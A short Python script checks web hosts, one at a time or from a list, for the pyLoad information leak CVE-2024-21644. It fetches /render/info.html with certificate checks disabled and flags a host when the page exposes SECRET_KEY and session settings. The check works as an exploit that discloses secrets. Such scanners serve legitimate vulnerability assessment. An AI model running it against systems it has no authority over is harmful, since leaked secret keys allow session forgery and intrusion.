import requests
from urllib.parse import urlparse,urljoin
import argparse
import urllib3
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def read_file(file_path):
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls



def check(url):
    try:
        url = url.rstrip('/')
        target = urljoin(url,'/render/info.html')
        headers = {
            "User-Agent": 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
            'Content-Type': 'text/xml'
        }
        response = requests.get(target, verify=False, headers=headers, timeout=15)
        if response.status_code == 200 and 'SECRET_KEY' in response.text and 'SESSION_COOKIE_SECURE' in response.text:
            print(f"\033[31mDiscovered:{url}: pyLoad_CVE-2024-21644_infoleakage!\033[0m")
            return True
    except Exception as e:
        print(e)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)